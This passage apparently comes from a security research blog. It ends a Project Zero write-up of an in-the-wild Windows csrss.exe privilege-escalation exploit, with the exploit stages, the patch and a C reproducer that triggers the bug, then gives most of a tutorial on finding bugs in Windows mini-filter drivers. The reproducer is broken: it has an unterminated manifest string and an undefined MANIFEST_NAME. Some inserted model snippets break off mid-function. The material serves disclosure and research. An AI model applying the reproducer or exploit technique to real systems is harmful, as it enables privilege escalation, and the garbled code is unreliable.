  SHORT TlsIndex;
  LIST_ENTRY HashTableEntry;
  ULONG TimeDateStamp;
} LDR_MODULE, *PLDR_MODULE;

When a new thread is created, the ntdll!LdrpInitializeThread function will follow the module list and, provided that the necessary flags are set, run the function referenced by the EntryPoint member with BaseAddress as the first argument. The EntryPoint call is still protected by the CFG, so the exploit can’t jump to a ROP chain yet. However, this gives the attacker the ability to execute an arbitrary sequence of one-argument function calls.

4. Launch a new thread. The exploit deliberately causes a null pointer dereference. The exception handler in csrss.exe catches it and creates an error-reporting task in a new thread via csrsrv!CsrReportToWerSvc.

5. Restore the module list. Once the execution reaches the fake module list processing, it’s important to restore PEB_LDR_DATA’s original state to avoid crashes in other threads. The attacker has discovered that a pair of ntdll!RtlPopFrame and ntdll!RtlPushFrame calls can be used to copy an 8-byte value from one given address to another. The fake module list starts with such a pair to fix the loader data structure.

6. Leak the stack register. In this step the exploit takes full advantage of the shared memory region. First, it calls setjmp to leak the register state into the shared region. The next module entry points to itself, so the execution enters an infinite loop of NtYieldExecution calls. In the meantime, the sandboxed process detects that the data in the setjmp buffer has been modified. It calculates the return address location for the LdrpInitializeThread stack frame, sets it as the destination address for a subsequent copy operation, and modifies the InLoadOrderModuleList pointer of the current module entry, thus breaking the loop.

7. Overwrite the return address. After the exploit exits the loop in csrss.exe, it performs two more copy operations: overwrites the return address with a stack pivot pointer, and puts the fake stack address next to it. Then, when LdrpInitializeThread returns, the execution continues in the ROP chain.

8. Transition to winlogon.exe. The ROP payload creates a new memory section and shares it with both winlogon.exe, which is another highly-privileged Windows process, and the sandboxed process. Then it creates a new thread in winlogon.exe using an address inside the section as the entry point. The sandboxed process writes the final stage of the exploit to the section, which downloads and executes an implant. The rest of the ROP payload is needed to restore the normal state of csrss.exe and terminate the error reporting thread.
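The core trick of steps 3 and 5, turning a loader list walk into a chain of one-argument calls, can be modeled in a few lines. The structures below are heavily simplified, hypothetical stand-ins for LIST_ENTRY and LDR_MODULE (only a forward link and the two fields the walk uses), and increment stands in for the ntdll functions the exploit actually chains. The flag checks performed by LdrpInitializeThread are omitted.

```c
#include <assert.h>
#include <stddef.h>

/* Simplified stand-ins: not the real LIST_ENTRY / LDR_MODULE layout. */
struct list_entry {
  struct list_entry *flink;
};

struct fake_module {
  struct list_entry in_load_order; /* first member, so the cast below works */
  void (*entry_point)(void *);
  void *base_address;
};

/* Stand-in for a one-argument function; here it just bumps a counter. */
void increment(void *arg) { ++*(int *)arg; }

/* Walks the circular list after head and calls EntryPoint(BaseAddress)
   for each entry, mirroring the behavior described for
   LdrpInitializeThread. */
void walk_modules(struct list_entry *head) {
  for (struct list_entry *e = head->flink; e != head; e = e->flink) {
    struct fake_module *m = (struct fake_module *)e;
    assert(m->entry_point != NULL);
    m->entry_point(m->base_address);
  }
}
```

In this model the next link is read only after each call returns, so an entry that points to itself loops forever until someone else rewrites its link, which is the situation the sandboxed process resolves in step 6.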

The fix

We reported the issue to Microsoft on March 23. As with the font bugs, it was subject to the 7-day deadline used by Project Zero for actively exploited vulnerabilities, but after receiving a request from the vendor, we agreed to provide an extension due to the global circumstances surrounding COVID-19. The fix came out 22 days after our report.

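The patch renamed BaseSrvSxsCreateActivationContext to BaseSrvSxsCreateActivationContextFromMessage and added an extra CsrValidateMessageBuffer call for the ApplicationName field, this time with MaximumLength as the size argument. If that check fails, the request is not rejected; instead, MaximumLength is temporarily lowered to Length + 2 and the original value is restored afterwards: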

ApplicationName = ApiMessage->CreateActivationContext.ApplicationName;
if (ApplicationName.MaximumLength &&
    !CsrValidateMessageBuffer(ApiMessage, &ApplicationName.Buffer,
                              ApplicationName.MaximumLength, 1)) {
  SavedMaximumLength = ApplicationName.MaximumLength;
  ApplicationName.MaximumLength = ApplicationName.Length + 2;
}

...

if (SavedMaximumLength)
  ApiMessage->CreateActivationContext.ApplicationName.MaximumLength =
      SavedMaximumLength;

return result;

Appendix A

The following reproducer has been tested on Windows 10.0.18363.959.

#include <stdint.h>
#include <stdio.h>
#include <windows.h>
#include <string>

const char* MANIFEST_CONTENTS =
    "<?xml version='1.0' encoding='UTF-8' standalone='yes'?>"
    "<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>"
    "<assemblyIdentity name='@' version='' type='win32' "



const WCHAR* NULL_BYTE_STR = L"\x00\x00";




const WCHAR* PATH = L"\\\\.\\c:Windows\\";
const WCHAR* MODULE = L"System.Data.SqlXml.Resources";

typedef PVOID(__stdcall* f_CsrAllocateCaptureBuffer)(ULONG ArgumentCount,
                                                     ULONG BufferSize);
f_CsrAllocateCaptureBuffer CsrAllocateCaptureBuffer;

typedef NTSTATUS(__stdcall* f_CsrClientCallServer)(PVOID ApiMessage,
                                                   PVOID CaptureBuffer,
                                                   ULONG ApiNumber,
                                                   ULONG DataLength);
f_CsrClientCallServer CsrClientCallServer;

typedef NTSTATUS(__stdcall* f_CsrCaptureMessageString)(LPVOID CaptureBuffer,
                                                       PCSTR String,
                                                       ULONG Length,
                                                       ULONG MaximumLength,
                                                       PSTR OutputString);
f_CsrCaptureMessageString CsrCaptureMessageString;

NTSTATUS CaptureUnicodeString(LPVOID CaptureBuffer, PSTR OutputString,
                              PCWSTR String, ULONG Length = 0) {
  if (Length == 0) {
    Length = lstrlenW(String);
  }
  return CsrCaptureMessageString(CaptureBuffer, (PCSTR)String, Length * 2,
                                 Length * 2 + 2, OutputString);
}

int main() {
  HMODULE Ntdll = LoadLibrary(L"Ntdll.dll");
  CsrAllocateCaptureBuffer = (f_CsrAllocateCaptureBuffer)GetProcAddress(
      Ntdll, "CsrAllocateCaptureBuffer");
  CsrClientCallServer =
      (f_CsrClientCallServer)GetProcAddress(Ntdll, "CsrClientCallServer");
  CsrCaptureMessageString = (f_CsrCaptureMessageString)GetProcAddress(
      Ntdll, "CsrCaptureMessageString");

  char Message[0x220];
  memset(Message, 0, 0x220);
  PVOID CaptureBuffer = CsrAllocateCaptureBuffer(4, 0x300);

  std::string Manifest = MANIFEST_CONTENTS;
  Manifest.replace(Manifest.find('@'), 1, 0x2000, 'A');

  // There's no public definition of the relevant CSR_API_MSG structure.
  // The offsets and values are taken directly from the exploit.
  *(uint32_t*)(Message + 0x40) = 0xc1;
  *(uint16_t*)(Message + 0x44) = 9;
  *(uint16_t*)(Message + 0x59) = 0x201;

  // CSRSS loads the manifest contents from the client process memory;
  // therefore, it doesn't have to be stored in the capture buffer.
  *(const char**)(Message + 0x80) = Manifest.c_str();
  *(uint64_t*)(Message + 0x88) = Manifest.size();
  *(uint64_t*)(Message + 0xf0) = 1;

  CaptureUnicodeString(CaptureBuffer, Message + 0x48, NULL_BYTE_STR, 2);
  CaptureUnicodeString(CaptureBuffer, Message + 0x60, MANIFEST_NAME);
  CaptureUnicodeString(CaptureBuffer, Message + 0xc8, PATH);
  CaptureUnicodeString(CaptureBuffer, Message + 0x120, MODULE);

  // Triggers the issue by setting ApplicationName.MaximumLength to a large value.
  *(uint16_t*)(Message + 0x122) = 0x8000;

  CsrClientCallServer(Message, CaptureBuffer, 0x10017, 0xf0);
}

This is part 6 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, see the introduction post.

Hunting for Bugs in Windows Mini-Filter Drivers

Posted by James Forshaw, Project Zero

In December Microsoft fixed 4 issues in Windows in the Cloud Filter and Windows Overlay Filter (WOF) drivers (CVE-2020-17103, CVE-2020-17134, CVE-2020-17136, CVE-2020-17139). These 4 issues were 3 local privilege escalations and a security feature bypass, and they were all present in Windows file system filter drivers. I’ve found a number of issues in filter drivers previously, including 6 in the LUAFV driver which implements UAC file virtualization.

The purpose of a file system filter driver, according to Microsoft, is:

“A file system filter driver can filter I/O operations for one or more file systems or file system volumes. Depending on the nature of the driver, filter can mean log, observe, modify, or even prevent. Typical applications for file system filter drivers include antivirus utilities, encryption programs, and hierarchical storage management systems.”

What this boils down to is that the filter driver can inspect and modify almost any IO request sent to a file system. This power comes with many responsibilities, and considering the complexity of the IO model on Windows, it can be hard to avoid introducing subtle bugs.

With the issues fixed, I thought it would be a good opportunity to go into more detail on how you can research file system filter drivers, specifically the kinds of things I looked at to find my security vulnerabilities. I’m going to give an overview of how filter drivers work, how you communicate with them, some hints on reverse engineering and some of the common security issues you might discover. I’ll also provide some example code to give you a basic idea of some common coding patterns. The goal is to allow you to do your own research in this area.

I’m assuming you have some prior knowledge of how the IO Manager works and have experience finding security issues in non-filter drivers. Also, I’m not claiming this to be an exhaustive description of bug hunting in filter drivers, as the topic is very deep and complex. With this in mind, let’s start with an overview of how a filter driver works.

Filter Driver Implementation

A filter driver exploits the way the Windows IO Manager implements file system drivers. When you make a request to access a file, such as by calling the NtCreateFile system call, the IO Manager allocates an IO Request Packet (IRP) structure, which contains the operation type and all the parameters for the operation. The IRP is then dispatched to the top of the device stack associated with the request.

A filter driver registers for the IO requests it supports with a callback function, which is invoked when an IRP of that request type is queued in the device stack. The driver callback can then do a number of different things to the IRP:

  • Pass the IRP unmodified directly to the next driver in the stack.
  • Modify the IRP then pass to the next driver.
  • Modify the IRP response.
  • Complete the IRP operation with a success result.
  • Complete the IRP operation with an error result.
  • Pass the IRP to a different device stack.

These are the basics of how a filter driver works: the driver is attached at a suitable point of a device stack and handles IO requests. When an IRP of interest is received, it can perform one of these operations to filter the request. If it wants to inspect or modify the response, it can register a completion routine and handle the operation in the callback.

It’s important to note that the IRP doesn’t automatically propagate down the stack. A driver can choose to complete the IRP, which means no driver further down the stack will process it. If the driver passes on the IRP it must register a completion routine, otherwise it won’t be notified when the IRP has been processed by the lower drivers in the stack.
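
These propagation rules can be modelled in a few lines of portable C. This is only a sketch under simplifying assumptions: the Irp and Driver types, send_irp and the sample routines are hypothetical and bear no relation to the real WDK structures. Each driver either passes the IRP down or completes it, and the completion routines of the drivers that passed it on run bottom-up on the way back.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical, simplified model of an IRP; not the WDK structure. */
typedef struct {
    int status;        /* final status of the request */
    char trace[64];    /* which routines ran, in order */
} Irp;

typedef enum { PASS_DOWN, COMPLETE } DispatchResult;

typedef struct {
    char name;                              /* one-letter driver id */
    DispatchResult (*dispatch)(Irp *irp);   /* runs on the way down */
    void (*completion)(Irp *irp);           /* NULL if none registered */
} Driver;

static void record(Irp *irp, char name, char direction) {
    char tag[3] = { name, direction, '\0' };
    strncat(irp->trace, tag, sizeof(irp->trace) - strlen(irp->trace) - 1);
}

/* stack[0] is the top of the device stack. */
static void send_irp(const Driver *stack, size_t count, Irp *irp) {
    size_t reached = 0;
    for (size_t i = 0; i < count; ++i) {
        record(irp, stack[i].name, 'v');
        reached = i;
        if (stack[i].dispatch(irp) == COMPLETE)
            break;                  /* nothing further down sees the IRP */
    }
    /* Unwind upwards: only drivers above the one that completed the IRP,
       and only those that registered a completion routine, are notified. */
    for (size_t i = reached; i-- > 0;) {
        if (stack[i].completion != NULL) {
            record(irp, stack[i].name, '^');
            stack[i].completion(irp);
        }
    }
}

/* Sample routines for a tiny stack. */
static DispatchResult pass_down(Irp *irp) { (void)irp; return PASS_DOWN; }
static DispatchResult complete_ok(Irp *irp) { irp->status = 0; return COMPLETE; }
static void on_complete(Irp *irp) { (void)irp; }
```

For a stack A, B, F where only A registers a completion routine and F completes the request, the trace is AvBvFvA^: B never learns the result because it didn’t ask to.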

For a file system filter the insertion point would typically be on top of the file system device object which is exposed by a file system driver such as NTFS. However, the driver can insert itself almost anywhere, allowing it to filter not just file system requests but also change data such as disk sectors. For example the Bitlocker Full Disk Encryption driver is a filter which is attached to the top of a volume block device. Any sectors passed in a write IRP are encrypted before passing to the lower driver. Read IRPs are handled in a completion routine and the sectors are decrypted before returning to the caller.

The Filter Manager and Mini-Filters

Implementing a filter driver from scratch is quite complicated. You have to handle every single IO request type, even if you don’t care about it, so that it can be forwarded to the next driver in the stack. You also have to find the correct point to insert your filter driver into the device stack. It’s easy to attach a driver to the top of the stack, but trying to insert it in the middle of an existing stack can be a recipe for disaster; for example, the ordering of the filter drivers in the stack might differ depending on load order.

To make it easier to write a filter driver Windows comes with the Filter Manager Driver which takes care of handling IO requests and device stacks. This allows a developer to write what’s called a mini-filter driver instead of a, now named, legacy filter driver. The following diagram shows how the architecture changes when you introduce the filter manager.

As you can see the mini-filters don’t add their own device objects to the stack. Instead they are registered with the filter manager and it’s the filter manager which inserts its own device. The filter manager handles the IO requests and calls registered mini-filters to process the request. If your mini-filter doesn’t support a certain IO request then the filter manager implements a default which handles passing the IRP on to the next driver in the stack.

Another useful feature is that the filter manager implements a mechanism for ordering the mini-filters through an altitude value. The higher the altitude value, the higher the priority. For example, a filter at altitude 10000 will be called before a filter at altitude 5000 when making an IO request. When handling responses the altitudes are processed in reverse order, so the filter at 5000 will be called first, then the one at 10000. Officially the altitude values must be registered with Microsoft, and MSDN contains a list of the currently registered altitudes. However, there’s nothing to stop a driver from registering itself with a different altitude, except that it’ll likely draw the ire of Microsoft and might fail certification. By formalizing the altitude values you avoid the risk that a filter driver’s ordering may change depending on load order.
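
The ordering rule is easy to sketch. The following assumes a hypothetical MiniFilter record and treats altitudes as plain integers for simplicity (real altitudes are strings interpreted as decimal numbers). Sorting by descending altitude gives the pre-operation order, and walking the same array backwards gives the post-operation order.

```c
#include <assert.h>
#include <stdlib.h>

/* Hypothetical registration record: only the fields needed for ordering. */
typedef struct {
    const char *name;
    unsigned long altitude;
} MiniFilter;

/* qsort comparator: higher altitude sorts first. */
static int by_altitude_desc(const void *a, const void *b) {
    unsigned long x = ((const MiniFilter *)a)->altitude;
    unsigned long y = ((const MiniFilter *)b)->altitude;
    return (x < y) - (x > y);
}

/* Sorts filters in place into pre-operation order. Post-operation
   callbacks are this same array walked from the end back to the start. */
static void order_for_pre_ops(MiniFilter *filters, size_t count) {
    qsort(filters, count, sizeof(filters[0]), by_altitude_desc);
}
```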

Mini-Filter Registration

A mini-filter driver registers its presence by calling the FltRegisterFilter filter manager API, normally during the driver’s entry point. The main parameter is a FLT_REGISTRATION structure which defines all the various callbacks for handling IO requests and bookkeeping. The important fields are the callbacks which a driver can register to respond to events from the filter manager. You can view what filters are registered with the filter manager using the fltmc command line tool (must be run as an administrator).

C:\> fltmc

Filter Name                     Num Instances    Altitude    Frame
------------------------------  -------------  ------------  -----
bindflt                                 1       409800         0
WdFilter                               17       328010         0
storqosflt                              1       244000         0
wcifs                                   0       189900         0
CldFlt                                  0       180451         0
FileCrypt                               0       141100         0
luafv                                   1       135000         0
npsvctrig                               1        46000         0
Wof                                    14        40700         0
FileInfo                               17        40500         0

We can see all the registered mini-filters, the number of instances, which indicates the number of volumes each filter has been attached to, and the altitude. There are 19 volumes available for filtering on the system I tested on (according to running fltmc volumes), so no filter is attached to everything. A driver can decide which volumes it wants to attach to by assigning an instance setup callback to the InstanceSetupCallback field in the filter registration structure. This callback is invoked for every volume on the system, including new ones added after the filter starts. The callback can return the status code STATUS_FLT_DO_NOT_ATTACH to block attachment.
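
Here is a minimal model of that per-volume decision, assuming a policy that only attaches to NTFS volumes. The FsType and SetupDecision enums are hypothetical stand-ins for the real FLT_FILESYSTEM_TYPE parameter and the STATUS_SUCCESS / STATUS_FLT_DO_NOT_ATTACH return codes.

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical stand-ins for the file system type the filter manager
   passes to the callback and the two possible outcomes. */
typedef enum { FS_NTFS, FS_REFS, FS_FAT, FS_CDFS, FS_OTHER } FsType;
typedef enum { ATTACH, DO_NOT_ATTACH } SetupDecision;

/* Example policy: only attach to NTFS volumes. */
static SetupDecision instance_setup(FsType fs) {
    return fs == FS_NTFS ? ATTACH : DO_NOT_ATTACH;
}

/* The callback runs once per volume, so the instance count reported by
   fltmc corresponds to the number of volumes that answered ATTACH. */
static size_t count_instances(const FsType *volumes, size_t count) {
    size_t attached = 0;
    for (size_t i = 0; i < count; ++i)
        if (instance_setup(volumes[i]) == ATTACH)
            ++attached;
    return attached;
}
```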

You can view what volumes a filter is attached to using fltmc again:

C:\> fltmc instances -f luafv

Instances for luafv filter:

Volume Name     Altitude        Instance Name       Frame  VlStatus
------------- ------------  ----------------------  -----  --------
C:               135000     luafv                     0

This just shows the volume that LUAFV is attached to. As UAC virtualization only makes sense in the context of the system drive, it’s only attached to C:. You can manually attach and detach filters on volumes using the fltmc tool with the attach and detach commands; we’ll show an example of using these commands later.

NOTE: Just because a filter driver is attached to a volume it doesn’t mean it’ll filter any IO requests for that volume. For example, the WOF driver is attached to all NTFS volumes, however it’ll only enable itself if there’s at least one file in the volume which is registered to be handled by WOF. Otherwise it ignores the IO request, letting it complete normally.

Most mini-filters only attach to file system volumes. However, the filter manager also supports attaching to the named pipe and mailslot devices. The filter driver indicates support by setting the FLTFL_REGISTRATION_SUPPORT_NPFS_MSFS flag in the FLT_REGISTRATION structure.

Mini-Filter IO Request Operation Callbacks

By far the most important field in the FLT_REGISTRATION structure is OperationRegistration which references a list of FLT_OPERATION_REGISTRATION structures defining the IO request callbacks. Each entry contains the IRP major code for the operation (such as IRP_MJ_CREATE or IRP_MJ_FILE_SYSTEM_CONTROL) and can have a pre-request and post-request callback. The driver doesn’t need to specify both if it doesn’t need both. The list is a variable length array, terminated with the major code being set to IRP_MJ_OPERATION_END (0x80). Any operation not in the list is handled by the filter manager which typically just ignores it and continues to the next filter in the list. A basic example of what you might see in C code is shown below.

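const FLT_OPERATION_REGISTRATION Callbacks[] = {
    { IRP_MJ_CREATE,
      0,
      PreCreateOperation,
      PostCreateOperation },
    { IRP_MJ_OPERATION_END }
};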

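When reverse engineering a driver you’ll usually find this array in its data section and have to walk it by hand. The sketch below does the same thing in portable C. The IRP_MJ_* values are the real major function codes, but OpRegistration is a simplified, hypothetical stand-in for FLT_OPERATION_REGISTRATION that stores callback names rather than function pointers.

```c
#include <assert.h>
#include <stddef.h>

/* Real IRP major function code values. */
#define IRP_MJ_CREATE              0x00
#define IRP_MJ_READ                0x03
#define IRP_MJ_WRITE               0x04
#define IRP_MJ_FILE_SYSTEM_CONTROL 0x0d
#define IRP_MJ_OPERATION_END       0x80

/* Simplified stand-in for FLT_OPERATION_REGISTRATION. */
typedef struct {
    unsigned char MajorFunction;
    const char *PreOperation;   /* callback name, or NULL if not registered */
    const char *PostOperation;
} OpRegistration;

/* Walks the variable-length array until the IRP_MJ_OPERATION_END
   terminator. NULL means the filter has no entry for this operation, so
   the filter manager's default handling applies. */
static const OpRegistration *find_registration(const OpRegistration *ops,
                                               unsigned char major) {
    for (; ops->MajorFunction != IRP_MJ_OPERATION_END; ++ops)
        if (ops->MajorFunction == major)
            return ops;
    return NULL;
}

static const OpRegistration kCallbacks[] = {
    { IRP_MJ_CREATE, "PreCreateOperation", "PostCreateOperation" },
    { IRP_MJ_FILE_SYSTEM_CONTROL, "PreFileSystemControlOperation", NULL },
    { IRP_MJ_OPERATION_END, NULL, NULL },
};
```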

A pre-request callback accepts three parameters:

  • The parameters for the operation, specified in a FLT_CALLBACK_DATA structure.
  • Related kernel objects, in a FLT_RELATED_OBJECTS structure.
  • An output pointer which can be assigned a callback context.

The prototype of the callback function pointer is:

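typedef FLT_PREOP_CALLBACK_STATUS
(*PFLT_PRE_OPERATION_CALLBACK) (
    PFLT_CALLBACK_DATA Data,
    PCFLT_RELATED_OBJECTS FltObjects,
    PVOID *CompletionContext
    );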

The parameters for the IO request are accessible through the FLT_CALLBACK_DATA structure’s Iopb field, which points to an FLT_IO_PARAMETER_BLOCK structure. The parameters are similar to the ones exposed through the IRP’s current IO_STACK_LOCATION structure. The data parameter also contains the IO_STATUS_BLOCK for the request and the caller’s requestor mode (either KernelMode or UserMode). The return code from the pre-request callback function determines what the filter driver wants to do with the request. The return type FLT_PREOP_CALLBACK_STATUS can be one of the following:

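  • FLT_PREOP_SUCCESS_WITH_CALLBACK: The callback was successful. Pass on the IO request and get a post-operation callback after completion.
  • FLT_PREOP_SUCCESS_NO_CALLBACK: The callback was successful. Pass on the IO request. No post-operation callback required.
  • FLT_PREOP_PENDING: Mark the IO operation as pending.
  • FLT_PREOP_DISALLOW_FASTIO: If handling a Fast IO operation, fail it to force the operation to be reissued as a normal IO request.
  • FLT_PREOP_COMPLETE: The operation has been completed. Do not pass on the IO request to any other drivers, not even lower filters in the stack.
  • FLT_PREOP_SYNCHRONIZE: Synchronize the post-operation callback, running it in the same thread as the pre-operation callback.
  • FLT_PREOP_DISALLOW_FSFILTER_IO: Disallow a fast QueryOpen operation, forcing it down the normal IO path.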
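
To summarise the most common cases, here is a simplified model of what each pre-operation status means for the rest of the request. The enum only mirrors the names of FLT_PREOP_CALLBACK_STATUS, not its values, and interpret_preop is a hypothetical helper. The pending and Fast IO statuses are deliberately left out since their outcome depends on what the filter does next.

```c
#include <assert.h>
#include <stdbool.h>

/* Mirrors the names of FLT_PREOP_CALLBACK_STATUS for illustration; the
   numeric values are NOT meant to match fltKernel.h. */
typedef enum {
    FLT_PREOP_SUCCESS_WITH_CALLBACK,
    FLT_PREOP_SUCCESS_NO_CALLBACK,
    FLT_PREOP_PENDING,
    FLT_PREOP_DISALLOW_FASTIO,
    FLT_PREOP_COMPLETE,
    FLT_PREOP_SYNCHRONIZE,
    FLT_PREOP_DISALLOW_FSFILTER_IO
} PreopStatus;

typedef struct {
    bool sent_to_lower;   /* lower filters and the file system see it */
    bool post_callback;   /* this filter's post-operation callback runs */
} PreopOutcome;

/* Simplified model of the synchronous IRP path. */
static PreopOutcome interpret_preop(PreopStatus s) {
    PreopOutcome o = { false, false };
    switch (s) {
    case FLT_PREOP_SUCCESS_WITH_CALLBACK:
    case FLT_PREOP_SYNCHRONIZE:
        o.sent_to_lower = true;
        o.post_callback = true;
        break;
    case FLT_PREOP_SUCCESS_NO_CALLBACK:
        o.sent_to_lower = true;
        break;
    case FLT_PREOP_COMPLETE:
        /* Completed here: nothing below runs and this filter gets no
           post-operation callback, though filters above still do. */
        break;
    default:
        break;
    }
    return o;
}
```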

A post-request callback accepts four parameters:

  • The parameters for the operation, specified in a FLT_CALLBACK_DATA structure.
  • Related kernel objects, in a FLT_RELATED_OBJECTS structure.
  • A context pointer which could have been assigned by the pre-operation callback.
  • Additional flags.

For post-operation callbacks the prototype is as follows:

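typedef FLT_POSTOP_CALLBACK_STATUS
(*PFLT_POST_OPERATION_CALLBACK) (
    PFLT_CALLBACK_DATA Data,
    PCFLT_RELATED_OBJECTS FltObjects,
    PVOID CompletionContext,
    FLT_POST_OPERATION_FLAGS Flags
    );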

The parameters are more or less the same as for the pre-operation callback. The CompletionContext parameter is the same one assigned in the pre-operation callback. If this value was allocated the post-operation callback needs to free the memory buffer to prevent leaking memory. The FLT_POSTOP_CALLBACK_STATUS return type can be one of the following values.

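  • FLT_POSTOP_FINISHED_PROCESSING: The callback was successful. No further processing required.
  • FLT_POSTOP_MORE_PROCESSING_REQUIRED: Halts completion of the IO request. The operation will be pending until the filter driver completes it.
  • FLT_POSTOP_DISALLOW_FSFILTER_IO: Disallow a fast QueryOpen operation, forcing it down the normal IO path.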
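
A CompletionContext allocated in the pre-operation callback is the post-operation callback’s job to free, so it’s worth checking the pairing when reviewing a driver. Here is a minimal user-mode sketch of the pattern. The CreateContext type, pre_create and post_create are hypothetical, and a global counter stands in for leak detection.

```c
#include <assert.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical per-request context passed from pre- to post-operation. */
typedef struct {
    unsigned long desired_access;
    char name[32];
} CreateContext;

static int live_contexts = 0;   /* outstanding allocations */

/* Pre-operation side: allocate and hand the pointer out through a
   CompletionContext-style out parameter. Returns 0 if allocation failed,
   in which case no post-operation callback should be requested. */
static int pre_create(const char *name, unsigned long access,
                      void **completion_context) {
    CreateContext *ctx = malloc(sizeof(*ctx));
    if (ctx == NULL)
        return 0;
    ctx->desired_access = access;
    strncpy(ctx->name, name, sizeof(ctx->name) - 1);
    ctx->name[sizeof(ctx->name) - 1] = '\0';
    ++live_contexts;
    *completion_context = ctx;
    return 1;
}

/* Post-operation side: consume and free the context on every path,
   otherwise each request leaks one allocation. */
static unsigned long post_create(void *completion_context) {
    CreateContext *ctx = completion_context;
    unsigned long access = ctx->desired_access;
    free(ctx);
    --live_contexts;
    return access;
}
```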

Handling IO Requests

Now that we’ve described the registration of the mini-filter and its callbacks, let's go through a few examples of how IO requests are handled inside the pre- and post-operation callbacks. We’ll use the six operations I mentioned earlier as a base for this discussion. The examples demonstrate the kind of code you’re likely to find in a driver but omit security checks and other unimportant details. This isn’t Stack Overflow, so please don’t copy and paste them into real drivers.

Pass the IO request unmodified

The simplest way of not modifying an IO request is to not specify a pre-operation callback. Of course we’re assuming the driver wants to handle an IO request selectively based on certain criteria so it must implement the callback.

The easiest way to ignore the IO request is to return the FLT_PREOP_SUCCESS_NO_CALLBACK status code from the pre-operation callback. That indicates to the filter manager that the mini-filter has completed its processing and is no longer interested in the IO request.

To give an example, the following pre-create operation callback will ignore any open request where the desired access does not include the FILE_WRITE_DATA access right. If the request doesn’t contain that access, it’s passed on with no post-operation callback.

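FLT_PREOP_CALLBACK_STATUS
PreCreateOperation(
    PFLT_CALLBACK_DATA Data,
    PCFLT_RELATED_OBJECTS FltObjects,
    PVOID* CompletionContext
) {
    PFLT_PARAMETERS ps = &Data->Iopb->Parameters;
    ACCESS_MASK access = ps->Create.SecurityContext->DesiredAccess;
    if ((access & FILE_WRITE_DATA) == 0) {
        // Not opened for writing, no further interest in this request.
        return FLT_PREOP_SUCCESS_NO_CALLBACK;
    }
    // Perform some operation...
    return FLT_PREOP_SUCCESS_NO_CALLBACK;
}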

The example extracts the desired access from the creation parameters. If the FILE_WRITE_DATA access right is not set then the filter driver will ignore the IO request entirely by returning the no callback status code.
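
The access check in the example boils down to a bitmask test. The sketch below uses the real winnt.h values for FILE_READ_DATA, FILE_WRITE_DATA and FILE_APPEND_DATA, and the function name is hypothetical. It also shows a gap worth looking for when reviewing such checks: a request for FILE_APPEND_DATA alone can still modify the file, yet it isn’t caught by a FILE_WRITE_DATA test.

```c
#include <assert.h>
#include <stdbool.h>

/* Same values as the access rights in winnt.h. */
#define FILE_READ_DATA   0x0001u
#define FILE_WRITE_DATA  0x0002u
#define FILE_APPEND_DATA 0x0004u

/* Mirrors the check in the pre-create example: requests that don't ask
   for FILE_WRITE_DATA are passed on and ignored. */
static bool wants_further_processing(unsigned long desired_access) {
    return (desired_access & FILE_WRITE_DATA) != 0;
}
```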

Of course depending on the purpose of the filter driver it might still want the post-operation callback to be called. For example if the filter driver is monitoring file access then the post-operation callback will contain valuable information such as the success or failure of opening the file or the data read from the file. In this case it makes sense to return FLT_PREOP_SUCCESS_WITH_CALLBACK.

When the driver specifies it wants a post-operation callback, it can set the CompletionContext to any value it likes. That value is then passed to the post-operation callback, which lets the driver pass additional data between the callbacks so that it can perform its operation correctly.

Modify the IO request

During a pre-operation callback the driver can modify the contents of the FLT_CALLBACK_DATA structure. For example, the driver could change the security context used to open the file or it could even change the name of the file itself. The driver must indicate to the filter manager that the data has been modified by setting the FLTFL_CALLBACK_DATA_DIRTY flag in the Flags field before returning. The correct way of setting the flag is to call the FltSetCallbackDataDirty API; however, all that currently does is set the flag.

Modify the IO request response

As with the request, you can modify the response in the post-operation callback, which will return the changes to higher mini-filters and the IO manager. One trick I’ve commonly seen is to use this to change the target file by modifying the file name and returning the status code STATUS_REPARSE, as if the file system had encountered a symbolic link. The following is the basic approach that the LUAFV driver uses to perform the reparse operation to an arbitrary file path in a post-operation callback.

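FLT_POSTOP_CALLBACK_STATUS LuafvPerformReparse(PFLT_CALLBACK_DATA Data,
                                        PUNICODE_STRING TargetFileName){
  LuafvSetEcp(Data, TargetFileName);
  PFILE_OBJECT FileObject = Data->Iopb->TargetFileObject;
  // Free the original name and replace it with the target name.
  ExFreePool(FileObject->FileName.Buffer);
  FileObject->FileName.Buffer = ExAllocatePool(PagedPool, 
                                               TargetFileName->Length);
  FileObject->FileName.MaximumLength = TargetFileName->Length;
  RtlCopyUnicodeString(&FileObject->FileName, TargetFileName);
  Data->IoStatus.Information = 0;
  Data->IoStatus.Status = STATUS_REPARSE;
  return FLT_POSTOP_FINISHED_PROCESSING;
}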

The code deallocates the filename buffer in the target file object and replaces it with its own. It then sets the status code to STATUS_REPARSE and indicates that processing has finished. In Windows 7 an IoReplaceFileObjectName API was introduced which makes this operation much less error prone; however, LUAFV was written for Vista, where the API didn’t exist, so it had to make do. An official Microsoft example can be found in the SimRep sample driver.

One quirk of this operation is the FileName in the file object is volume relative, e.g. if you opened c:\windows\notepad.exe then FileName is set to \windows\notepad.exe. However, you can replace that with an absolute path such as \??\d:\abc.txt and that still works. Also the driver doesn’t need to create a real mount point or symbolic link reparse point buffer for this to work. The IO manager will just take the path from the file object and restart the create request with the new path.
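
The restart behaviour can be sketched as a loop: the filter rewrites the name and returns STATUS_REPARSE, and the IO manager retries the create with whatever name the file object now holds. Everything here is a simplified user-mode model. The FileObject type, redirect_filter, open_file and the restart limit of 8 are hypothetical; only the STATUS_REPARSE value (0x104) comes from the real headers.

```c
#include <assert.h>
#include <stdio.h>
#include <string.h>

#define STATUS_SUCCESS 0x00000000u
#define STATUS_REPARSE 0x00000104u

/* Hypothetical, simplified file object: just the name the create uses. */
typedef struct {
    char FileName[128];
} FileObject;

/* Sketch of the filter: if the volume-relative name matches, swap in an
   absolute path and ask for the create to be restarted. */
static unsigned redirect_filter(FileObject *fo) {
    if (strcmp(fo->FileName, "\\windows\\notepad.exe") == 0) {
        snprintf(fo->FileName, sizeof(fo->FileName), "%s", "\\??\\d:\\abc.txt");
        return STATUS_REPARSE;
    }
    return STATUS_SUCCESS;
}

/* Sketch of the IO manager side: keep restarting the create with the
   file object's current name, up to an arbitrary limit chosen here. */
static unsigned open_file(FileObject *fo, int *restarts) {
    *restarts = 0;
    for (int i = 0; i < 8; ++i) {
        unsigned status = redirect_filter(fo);
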